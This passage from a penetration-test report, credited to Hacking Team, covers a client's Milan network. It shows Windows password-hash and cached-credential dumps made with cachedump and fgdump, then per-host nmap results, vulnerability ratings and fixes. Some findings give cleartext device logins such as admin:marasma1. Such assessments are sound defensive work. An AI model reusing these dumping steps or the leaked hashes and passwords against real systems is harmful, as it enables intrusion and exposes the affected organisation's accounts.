Guest(current):501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c0
89c0:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 213 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
MTSWriter(current):1009:19fb4918fc87d8b37a8136f95e7b19c9:a9da2a499b194c6606f3457
44c318aae:::
MTSWriter(hist_01):1009:19fb4918fc87d8b37a8136f95e7b19c9:a9da2a499b194c6606f3457
44c318aae:::
PCWriter(current):1000:fa31e67228189222ec44577791d1bb4f:391155dad0d5c614eb7f4e20
8297a7fe:::
PCWriter(hist_01):1000:fa31e67228189222ec44577791d1bb4f:391155dad0d5c614eb7f4e20
8297a7fe:::
PCWriter(hist_02):1000:799272b2884c5fc5aad3b435b51404ee:842b7ebfc4dd4ddeeb5c799b
a554fdbd:::
C:\WUTemp>VER
VER
Microsoft Windows 2000 [Version 5.00.2195]
C:\WUTemp>ipconfig
ipconfig
Windows 2000 IP Configuration
Ethernet adapter MTS Milan LAN:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 100.100.200.73
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 100.100.200.254
C:\WUTemp>cachedump.exe
cachedump.exe
mbiazzo:499679EBE789E1B6D7D75DEEB9AE209F:mtsgroup:
bvhelpdesk:443E5F64D4AA2D7101B38EF2E3C5CE7A:mtsgroup:
sborghesio:0E445FB07136843E7A0CF596B6FCFAEC:mtsgroup:
pcambieri:07C0C68CBEEC3778E8F6F82C19C7FB7E:mtsgroup:
dbrizzi:95090A6567D6DF114987033738E2386C:mtsgroup:
administrator:12525A1BE44E028475D375E6100A7F86:mtsgroup:
pbizzoca:3EAC093A372C5484AAB27278B9316632:mtsgroup:
mbiazzo_a:DBE278AEE3E912BD3E4961E74AF9DBEC:mtsgroup:
hmaatugh:100EFB237152D8175D625AAFD7817CB2:mtsgroup:
C:\WUTemp>fgdump.exe
fgDump 1.6.0 - fizzgig and the mighty group at foofus.net
Written to make j0m0kun's life just a bit easier
Copyright(C) 2007 fizzgig and foofus.net
fgdump comes with ABSOLUTELY NO WARRANTY!
This is free software, and you are welcome to redistribute it
under certain conditions; see the COPYING and README files for
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 214 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
more information.
No parameters specified, doing a local dump. Specify -? if you are looking for
help.
Starting dump on 127.0.0.1
** Beginning local dump **
OS (127.0.0.1): Microsoft Windows 2000 Professional Service Pack 4 (Build 2195)
Passwords dumped successfully
Cache dumped successfully
-----Summary-----
Failed servers:
NONE
Successful servers:
127.0.0.1
6.6.6 100.100.200.179 [Compromised]
Rating: compromised
Vulnerabilities found: V4, V5, V6, V7
Risk state: High
Skill level required to exploit the vulnerability: Low
Solution: Install all OS updates; consider disabling or replacing telnet with SSH; check for and remove
information disclosure issues in the web administration panel
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Embedded
Vendor/OS MGE UPS Version EX 11 RT 3:1
Hostname UPS-PPF
Compromi
sed
Compromised Directly Info Authentication bypass
Auth Not needed, admin:marasma1
The host was alive and these additional information could be extracted:
22/tcp open ssh (protocol 1.99)
23/tcp open telnet MGE UPS telnetd
25/tcp open smtp?
80/tcp open http MGE UPS httpd 1.0
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 215 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
443/tcp open https?
5000/tcp open tcpwrapped
TCP Sequence Prediction: Difficulty=0 (Trivial joke)
IPID Sequence Generation: Incremental
Service Info: Device: power-device
Telnetd is an insecure service, use SSH v2 or at least telnet-ssl. Disable the service if not needed.
TCP Sequence number generation seems to be extremely weak allowing MITM attacks.
The SSH daemon uses an outdated protocol version.
The web administration panel is vulnerable to Authentication Bypass permitting external attackers
to gain admin privileges on the device without supplying a valid password.
The web administration panel has Information Disclosure issues, allowing the original password to
be recovered (admin:marasma1).
6.6.7 100.100.200.233 [Compromised]
Rating: compromised
Vulnerabilities found: V2,V5, V6, V10
Risk state: Medium
Skill level required to exploit the vulnerability: Low
Solution: Install all OS updates; disable telnet or replace it with SSH or telnets; disable SSH protocol v1
support and only allow v2; change all default passwords
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Network
Vendor/OS 3Com Version 2 X SWITCH 3870 24-PORT
Hostname Switch-PPF-FL00
Compromised Compromised Directly Info Weak password
Auth monitor:monitor / test:t3st3d
The host was alive and these additional information could be extracted:
22/tcp open ssh (protocol 1.99)
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 216 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
23/tcp open telnet Cisco microswitch telnetd
80/tcp open http Generic router http config
443/tcp open ssl/tcpwrapped
Uptime: 235.704 days (since Wed Nov 22 22:41:50 2006)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=147 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: Devices: switch, router
Telnetd is an insecure service, use SSH v2 or at last telnet-ssl. Disable the service if not needed.
The SSH daemon uses an outdated protocol version.
It was possible to login in the administration by trying a default password set.
Once logged in as monitor it was possible to reset the admin password, leading to privilege
escalation.
6.6.8 100.100.200.11 [Unsafe]
Rating: unsafe
Vulnerabilities found: V9
Risk state: Medium
Skill level required to exploit the vulnerability: Low
Solution: Recheck the Active Directory domain logon policies and trust relationships
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Microsoft Windows/HP Proliant Version Server 2003 3790 SP1
Hostname MILLDMS01
Compromised Not Compromised Directly Info Domain user
Auth Not needed
The host was alive and these additional information could be extracted:
21/tcp open ftp Microsoft ftpd
80/tcp open http Microsoft IIS webserver 6.0
135/tcp open msrpc Microsoft Windows RPC
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 217 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
139/tcp open netbios-ssn
443/tcp open ssl/http Microsoft IIS webserver 6.0
445/tcp open microsoft-ds Microsoft Windows 2003 microsoft-ds
1040/tcp open remoting MS .NET Remoting services
1050/tcp open java-or-OTGfileshare?
1248/tcp open nsclient Netsaint Windows Client
2301/tcp open http HP Proliant System Management 2.0.2.106
(CompaqHTTPServer 9.9)
3389/tcp open microsoft-rdp Microsoft Terminal Service
9535/tcp open man?
38292/tcp open landesk-cba?
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
It was possible to gain Administrator privileges on the host using a Domain User with the right
privileges.
6.6.9 100.100.200.22 [Unsafe]
Rating: unsafe
Vulnerabilities found: V6, V7
Risk state: High
Skill level required to exploit the vulnerability: Low
Solution: Disable finger service; replace ftp with ftps
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Sun Solaris Version Sun StorEdge T300
Hostname MILSUNWS1 NS2.MILANO.MTSGROUP.ORG
Compromised No Info
Auth Not detected
The host was alive and these additional information could be extracted:
7/tcp open echo© 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 218 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
9/tcp open discard?
13/tcp open daytime Sun Solaris daytime
19/tcp open chargen
21/tcp open ftp Solaris ftpd
22/tcp open ssh SunSSH 1.0 (protocol 2.0)
25/tcp open smtp Sendmail 8.12.10+Sun/8.12.10
37/tcp open time (32 bits)
53/tcp open domain ISC Bind 9.2.2
79/tcp open finger Sun Solaris fingerd
111/tcp open rpcbind 2-4 (rpc #100000)
512/tcp open exec
513/tcp open rlogin
514/tcp open tcpwrapped
515/tcp open printer Solaris lpd
540/tcp open uucp Solaris uucpd
587/tcp open smtp Sendmail 8.12.10+Sun/8.12.10
898/tcp open http Sun Solaris Management Console (Runs Tomcat
webserver)
4045/tcp open nlockmgr 1-4 (rpc #100021)
6112/tcp open dtspc?
7100/tcp open font-service Sun Solaris fs.auto
32771/tcp open ttdbserverd 1 (rpc #100083)
32772/tcp open kcms_server 1 (rpc #100221)
32773/tcp open metad 1 (rpc #100229)
32774/tcp open metamhd 1 (rpc #100230)
32775/tcp open rpc.metamedd 1 (rpc #100242)
32776/tcp open rusersd 2-3 (rpc #100002)
32777/tcp open status 1 (rpc #100024)
32778/tcp open sometimes-rpc19?
32779/tcp open sometimes-rpc21?
Uptime: 258.682 days (since Sat Oct 28 16:24:02 2006)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=156 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: Host: ns2.milano.mtsgroup.org; OSs: Solaris, Unix
The fingerd service is prone to Information Disclosure.
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 219 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Ftpd is a cleartext and insecure service, consider disabling it or at least replacing it with its
cryptographic counterpart.
6.6.10 100.100.200.23 [Unsafe]
Rating: unsafe
Vulnerabilities found: V6, V7
Risk state: High
Skill level required to exploit the vulnerability: Low
Solution: Disable finger service; replace ftp with ftps
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Sun Solaris Version Sun StorEdge T300
Hostname MILSUNWS2 MILSUNWS2.MILANO.MTSGROUP.ORG
Compromised No Info Network DoS attacks
Auth Not detected
The host was alive and these additional information could be extracted:
7/tcp open echo
9/tcp open discard?
13/tcp open daytime Sun Solaris daytime
19/tcp open chargen
21/tcp open ftp Solaris ftpd
22/tcp open ssh SunSSH 1.0 (protocol 2.0)
25/tcp open smtp Sendmail 8.12.10+Sun/8.12.8
37/tcp open time (32 bits)
53/tcp open domain ISC Bind 9.2.2
79/tcp open finger Sun Solaris fingerd
80/tcp open http Apache httpd 1.3.29 ((Unix) mod_perl/1.25)
111/tcp open rpcbind 2-4 (rpc #100000)
512/tcp open exec
513/tcp open rlogin
514/tcp open tcpwrapped
515/tcp open printer Solaris lpd
540/tcp open uucp Solaris uucpd
587/tcp open smtp Sendmail 8.12.10+Sun/8.12.8
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 220 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
898/tcp open http Sun Solaris Management Console (Runs Tomcat
webserver)
4045/tcp open nlockmgr 1-4 (rpc #100021)
6112/tcp open dtspc?
7100/tcp open font-service Sun Solaris fs.auto
32771/tcp open ttdbserverd 1 (rpc #100083)
32772/tcp open kcms_server 1 (rpc #100221)
32773/tcp open metad 1 (rpc #100229)
32774/tcp open metamhd 1 (rpc #100230)
32775/tcp open rpc.metamedd 1 (rpc #100242)
32776/tcp open rusersd 2-3 (rpc #100002)
32777/tcp open status 1 (rpc #100024)
32778/tcp open sometimes-rpc19?
32779/tcp open sometimes-rpc21?
Uptime: 258.685 days (since Sat Oct 28 16:24:37 2006)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=151 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: Hosts: milsunws2, milsunws2.milano.mtsgroup.org; OSs: Solaris,
Unix
The fingerd service is prone to Information Disclosure.
Ftpd is a cleartext and insecure service, consider disabling it or at least replacing it with its
cryptographic counterpart.
6.6.11 100.100.200.25, 100.100.200.27, 100.100.200.28, 100.100.200.29, 100.100.200.30, 100.100.200.31
[Unsafe]
Rating: unsafe
Vulnerabilities found: V9
Risk state: Medium
Skill level required to exploit the vulnerability: Low
Solution: Recheck the Active Directory domain logon policies and trust relationships
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 221 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Vendor/OS Microsoft Windows/HP Proliant Version Server 2003 3790 SP1
Hostname MILWINCL1N1 MILWINCL1, MILFS01, MILDHCP, MILPS01, MILITFS01
Compromised Not Compromised Directly Info Domain User
Auth Not needed
The host was alive and these additional information could be extracted:
53/tcp open domain Microsoft DNS
88/tcp open kerberos-sec Microsoft Windows kerberos-sec
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
389/tcp open ldap Microsoft LDAP server
445/tcp open microsoft-ds Microsoft Windows 2003 microsoft-ds
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1025/tcp open msrpc Microsoft Windows RPC
1027/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
1043/tcp open msrpc Microsoft Windows RPC
1248/tcp open nsclient Netsaint Windows Client
2301/tcp open http Compaq Diagnostis httpd (CompaqHTTPServer
5.91)
3268/tcp open ldap Microsoft LDAP server
3269/tcp open tcpwrapped
3389/tcp open microsoft-rdp Microsoft Terminal Service
6101/tcp open VeritasBackupExec?
6106/tcp open msrpc Microsoft Windows RPC
10000/tcp open backupexec Veritas Backup Exec 9.0
49400/tcp open http Compaq Diagnostis httpd (CompaqHTTPServer
5.91)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
This host is a Windows Active Directory Domain Controller.
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 222 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
It was possible to gain Administrator privileges on the host using a Domain User with the right
privileges.
6.6.12 100.100.200.26 [Unsafe]
Rating: unsafe
Vulnerabilities found: V9
Risk state: Medium
Skill level required to exploit the vulnerability: Low
Solution: Recheck the Active Directory domain logon policies and trust relationships
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Microsoft Windows/HP
Proliant
Version Server 2003 3790 SP1
Hostname MILWINCL1N2
Compromise
d
Not Compromised Directly Info Domain User
Auth Not needed
The host was alive and these additional information could be extracted:
53/tcp open domain Microsoft DNS
88/tcp open kerberos-sec Microsoft Windows kerberos-sec
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
389/tcp open ldap Microsoft LDAP server
445/tcp open microsoft-ds Microsoft Windows 2003 microsoft-ds
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1025/tcp open msrpc Microsoft Windows RPC
1027/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
1248/tcp open nsclient Netsaint Windows Client
2301/tcp open http HP Proliant System Management 2.0.2.106
(CompaqHTTPServer 9.9)
3389/tcp open microsoft-rdp Microsoft Terminal Service
49400/tcp open http Compaq Diagnostis httpd (CompaqHTTPServer 5.91)
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 223 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
This host is a Windows Active Directory Domain Controller.
It was possible to gain Administrator privileges on the host using a Domain User with the right
privileges.
6.6.13 100.100.200.32 [Unsafe]
Rating: unsafe
Vulnerabilities found:V5
Risk state: High
Skill level required to exploit the vulnerability: Low
Solution: Disable SSH protocol v1 support and only enable v2
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS OpenBSD Version Not detected
Hostname bvportal.mtsgroup.org Bond Vision
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
22/tcp open ssh OpenSSH 4.2 (protocol 1.99)
25/tcp open smtp Sendmail 8.13.4/8.13.4
37/tcp open time (32 bits)
80/tcp open http Apache httpd 2.2.4 ((Unix) mod_ssl/2.2.4 OpenSSL/0.9.8e
PHP/5.2.2)
113/tcp open ident OpenBSD identd
587/tcp open smtp Sendmail 8.13.4/8.13.4
3306/tcp open mysql MySQL 5.0.41-log
6000/tcp open X11 (access denied)
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 224 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Uptime: 44.791 days (since Wed May 30 14:00:46 2007)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=189 (Good luck!)
IPID Sequence Generation: All zeros
Service Info: Host: bvportal.mtsgroup.org; OSs: Unix, OpenBSD
The SSH daemon uses an outdated protocol version.
6.6.14 100.100.200.35 [Unsafe]
Rating: unsafe
Vulnerabilities found: V6, V7
Risk state: Medium
Skill level required to exploit the vulnerability: Low
Solution: Replace telnet with telnets or SSH, ftp with ftps; disable finger service
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Sun Solaris Version Not detected
Hostname fuffy.mtsgroup.org Bond Vision
Compromi
sed
Dos Info Network DoS attacks
Auth Not detected
The host was alive and these additional information could be extracted:
7/tcp open echo
9/tcp open discard?
13/tcp open daytime Sun Solaris daytime
19/tcp open chargen
21/tcp open ftp Solaris ftpd
22/tcp open ssh SunSSH 1.0 (protocol 2.0)
23/tcp open telnet Sun Solaris telnetd
25/tcp open smtp Sendmail 8.12.8+Sun/8.12.8
37/tcp open time (32 bits)
79/tcp open finger Sun Solaris fingerd
111/tcp open rpcbind 2-4 (rpc #100000)
512/tcp open exec© 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 225 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
513/tcp open rlogin
514/tcp open tcpwrapped
515/tcp open printer Solaris lpd
540/tcp open uucp Solaris uucpd
587/tcp open smtp Sendmail 8.12.8+Sun/8.12.8
665/tcp open unknown
898/tcp open http Sun Solaris Management Console (Runs Tomcat
webserver)
1158/tcp open http Oracle Application Server httpd 9.0.4.1.0
1521/tcp open oracle-tns Oracle TNS Listener
1526/tcp open oracle-tns Oracle TNS Listener
4045/tcp open nlockmgr 1-4 (rpc #100021)
5520/tcp open sdlog Oracle Enterprise Manager
5560/tcp open http Oracle Application Server httpd 9.0.4.1.0
6000/tcp open X11 (access denied)
6112/tcp open dtspc?
7100/tcp open font-service Sun Solaris fs.auto
32774/tcp open ttdbserverd 1 (rpc #100083)
32775/tcp open ttdbserverd 1 (rpc #100083)
32776/tcp open rpc
32777/tcp open rpc
32778/tcp open metad 1 (rpc #100229)
32779/tcp open metad 1 (rpc #100229)
32780/tcp open metamhd 1 (rpc #100230)
32786/tcp open status 1 (rpc #100024)
32787/tcp open status 1 (rpc #100024)
Uptime: 280.855 days (since Fri Oct 6 12:32:26 2006)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=159 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: Host: fuffy.mtsgroup.org; OSs: Solaris, Unix
Telnetd and ftpd are cleartext and insecure services, consider disabling them or at least replacing
them with their cryptographic counterparts.
The fingerd service is prone to Information Disclosure.
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 226 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
6.6.15 100.100.200.36 [Unsafe]
Rating: unsafe
Vulnerabilities found: V4
Risk state: Medium
Skill level required to exploit the vulnerability: Low
Solution: Install all OS vendor patches, especially TCP/IP stack related ones
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Not detected Version ES Web Server (Java)
Hostname Not detected
Compromi
sed
No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
80/tcp open http?
OS fingerprint not ideal because: Missing a closed TCP port so results
incomplete
TCP Sequence Prediction: Difficulty=0 (Trivial joke)
IPID Sequence Generation: Incremental
TCP Sequence number generation seems to be extremely weak allowing MITM attacks.
6.6.16 100.100.200.37 [Unsafe]
Rating: unsafe
Vulnerabilities found: V4
Risk state: Medium
Skill level required to exploit the vulnerability: Low
Solution: Install all OS vendor patches, especially TCP/IP stack related ones
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Not detected Version ES Web Server (Java)
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 227 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Hostname Not detected
Compromi
sed
No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
80/tcp open http?
OS fingerprint not ideal because: Missing a closed TCP port so results
incomplete
TCP Sequence Prediction: Difficulty=0 (Trivial joke)
IPID Sequence Generation: Incremental
TCP Sequence number generation seems to be extremely weak allowing MITM attacks.
6.6.17 100.100.200.80 [Unsafe]
Rating: unsafe
Vulnerabilities found: V6
Risk state: High
Skill level required to exploit the vulnerability: Low
Solution: Disable the cleartext telnet/ftp services or replace them with telnets/ssh/ftps
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Network
Vendor/OS IRIX Version Router
Hostname Not detected
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
21/tcp open ftp Nortel WfFTP x14.00
23/tcp open telnet IRIX telnetd 6.X
Network Distance: 2 hops
Service Info: OS: IRIX; Device: router
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 228 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Telnetd and ftpd are cleartext and insecure services, consider disabling them or at least replacing
them with their cryptographic counterparts.
6.6.18 100.100.200.108 [Unsafe]
Rating: unsafe
Vulnerabilities found: V4, V9
Risk state: Medium
Skill level required to exploit the vulnerability: Low
Solution: Install all OS updates, especially TCP/IP stack related ones; check the Active Directory domain
logon policies and trust relationships
Discovery method Missed Initial scan, ICMP Echo Ping on Second scan
Availability Daylight (Workstation/Notebook)
Class Server
Vendor/OS Microsoft Windows Version XP SP2/2003 Server
Hostname MILSIAWS03
Compromise
d
Not Compromised Directly Info Domain User
Auth Not needed
The host was alive and these additional information could be extracted:
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
3389/tcp open microsoft-rdp Microsoft Terminal Service
9535/tcp open man?
TCP Sequence Prediction: Difficulty=0 (Trivial joke)
IPID Sequence Generation: Busy server or unknown class
Service Info: OS: Windows
TCP Sequence number generation seems to be extremely weak allowing MITM attacks.
It was possible to gain Administrator privileges on the host using a Domain User with the right
privileges.
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 229 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
6.6.19 100.100.200.156 [Unsafe]
Rating: unsafe
Vulnerabilities found: V4, V6
Risk state: Medium
Skill level required to exploit the vulnerability: Low
Solution: Install all OS updates, especially TCP/IP stack related ones; replace ftp with ftps
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Microsoft Windows Version Not detected
Hostname PROXY PROXY.NTLMLAB.COM, AD NTLMLAB
Compromi
sed
No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
21/tcp open ftp Microsoft ftpd
80/tcp open http Microsoft IIS httpd 6.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
443/tcp open https?
445/tcp open microsoft-ds Microsoft Windows 2003 microsoft-ds
1025/tcp open msrpc Microsoft Windows RPC
8080/tcp open http-proxy Microsoft ISA Server Web Proxy (Proxy auth required)
TCP Sequence Prediction: Difficulty=0 (Trivial joke)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
TCP Sequence number generation seems to be extremely weak allowing MITM attacks.
Ftpd is a cleartext and insecure service, consider disabling it or at least replacing it with its
cryptographic counterpart.
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 230 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
6.6.20 100.100.200.232 [Unsafe]
Rating: unsafe
Vulnerabilities found: V5, V6
Risk state: Medium
Skill level required to exploit the vulnerability: Low
Solution: Install all OS updates; disable telnet or replace it with SSH, telnets; disable SSH protocol v1
support and only allow v2
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Network
Vendor/OS 3Com Version 2 X SWITCH 3870 24-PORT
Hostname Switch-PPF-FL03
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
22/tcp open ssh (protocol 1.99)
23/tcp open telnet Cisco microswitch telnetd
80/tcp open http?
443/tcp open https?
Uptime: 22.842 days (since Thu Jun 21 13:57:09 2007)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=147 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: Device: switch
Telnetd is an insecure service, use SSH v2 or at last telnet-ssl. Disable the service if not needed.
The SSH daemon uses an outdated protocol version.
6.6.21 100.100.200.107 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a© 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 231 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Solution: n/a
Discovery method Missed Initial scan, Hidden on Second scan
Availability Daylight (Workstation/Notebook)
Class Server
Vendor/OS Microsoft Windows Version Not detected
Hostname MILSIAWS05
Compromi
sed
No Info None
Auth Not detected
On this IP there is an alive host in hidden mode.
The host was alive but no additional information could be extracted.
6.6.22 100.100.200.247 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Network
Vendor/OS Cisco Version PIX Firewall (PIX 6.2 - 6.3.3|
PixOS 5.2 – 6.1)
Hostname Not detected
Compromised No Info None
Auth Not detected
The host was alive but no additional information could be extracted:
Warning: OS detection will be MUCH less reliable because we did not find at
least 1 open and 1 closed TCP port
All 1697 scanned ports on 100.100.200.247 are closed
Device type: firewall
Running: Cisco PIX 5.X|6.X
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 232 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
OS details: Cisco PIX Firewall (PixOS 5.2 - 6.1), Cisco PIX Firewall running PIX
6.2 - 6.3.3
OS Fingerprint:
OS:SCAN(V=4.20%D=7/14%OT=%CT=1%CU=%PV=N%G=N%TM=469884BD%P=i686-pc-linux-gnu
OS:)T5(Resp=Y%DF=N%W=C00%ACK=S++%Flags=AR%Ops=WNMETL)T6(Resp=Y%DF=N%W=1000%
OS:ACK=S%Flags=AR%Ops=WNMETL)T7(Resp=Y%DF=N%W=C00%ACK=S++%Flags=UAPR%Ops=WN
OS:METL)PU(Resp=N)
6.6.23 100.100.200.254 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Network
Vendor/OS Cisco Version PIX Firewall (PIX 6.2 -
6.3.3|PixOS 5.2 – 6.1)
Hostname Not detected
Compromi
sed
No Info None
Auth Not detected
